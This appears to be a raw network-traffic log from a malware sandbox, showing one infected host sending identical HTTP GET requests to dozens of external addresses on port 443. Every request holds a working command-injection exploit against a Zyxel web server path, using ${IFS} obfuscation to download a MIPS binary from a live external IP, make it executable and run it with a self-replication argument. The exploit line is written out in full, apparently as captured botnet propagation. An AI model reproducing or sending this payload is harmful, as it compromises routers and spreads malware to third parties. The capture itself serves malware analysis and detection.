                                            Feb 2, 2024 06:21:18.748085976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5844192.168.2.155045284.136.138.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748136997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5845192.168.2.1537880111.55.91.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748174906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5846192.168.2.1550964213.178.116.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748202085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5847192.168.2.1538306157.114.162.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748248100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5848192.168.2.154874863.76.197.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748301029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5849192.168.2.156062654.120.88.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748341084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5850192.168.2.1546618139.2.216.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748388052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5851192.168.2.154537671.138.226.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748435974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5852192.168.2.1547658124.149.228.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748466969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5853192.168.2.1543718126.116.55.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748509884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5854192.168.2.1547312220.254.184.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748564005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5855192.168.2.155224449.138.225.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748591900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5856192.168.2.155771884.90.39.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748620033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5857192.168.2.15455825.135.92.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748644114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5858192.168.2.15505588.150.77.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748697042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5859192.168.2.154205419.155.163.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748703957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5860192.168.2.153578013.175.25.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748763084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5861192.168.2.1559590153.64.190.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748815060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5862192.168.2.155343831.211.82.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748841047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5863192.168.2.1554900188.9.92.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748904943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5864192.168.2.154946274.249.212.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748948097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5865192.168.2.1549420126.207.228.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748989105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5866192.168.2.155736262.187.198.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749017000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5867192.168.2.153944065.43.130.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749051094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5868192.168.2.155128475.204.143.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749089956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5869192.168.2.155540293.108.89.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749126911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5870192.168.2.1554044181.163.201.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749160051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5871192.168.2.1559428196.114.165.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749191999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5872192.168.2.1559870165.251.216.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749247074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5873192.168.2.155187661.134.162.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749294996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5874192.168.2.154686881.46.54.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749326944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5875192.168.2.153561436.231.233.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749371052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5876192.168.2.155744470.255.19.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749382973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5877192.168.2.1545498213.149.93.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749403954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5878192.168.2.154438262.91.81.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749439955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5879192.168.2.153622691.64.152.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749492884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5880192.168.2.1542538184.101.197.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749541998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5881192.168.2.1557858110.223.76.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749577999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5882192.168.2.153296291.100.90.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749629974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5883192.168.2.1557128155.43.130.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749670029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5884192.168.2.1555416120.71.198.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749695063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5885192.168.2.1555400126.36.239.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749752045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5886192.168.2.1547174106.70.50.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749768019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5887192.168.2.153803249.109.41.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749803066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5888192.168.2.155241886.129.45.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749835968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5889192.168.2.1549164174.209.153.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749891996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5890192.168.2.154707031.120.130.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749933004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5891192.168.2.1557074148.203.112.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.749958038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5892192.168.2.1543194142.79.79.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750011921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5893192.168.2.154016272.63.23.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750055075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5894192.168.2.1551890146.83.109.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750087976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5895192.168.2.1559404146.103.42.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750123978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5896192.168.2.154840820.23.15.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750174999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5897192.168.2.1532886154.253.2.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750205040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5898192.168.2.153716889.166.24.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750236988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5899192.168.2.1540650173.58.217.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750271082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5900192.168.2.1548588134.184.88.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750329018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5901192.168.2.154021888.133.178.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750365019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5902192.168.2.1538328223.143.116.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750411034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5903192.168.2.15572704.187.218.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750452042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5904192.168.2.1554632178.163.75.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750472069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5905192.168.2.154623047.32.39.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750524998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5906192.168.2.1541422179.112.236.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750569105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5907192.168.2.1545518162.132.65.77443
                                            TimestampBytes transferredDirectionData
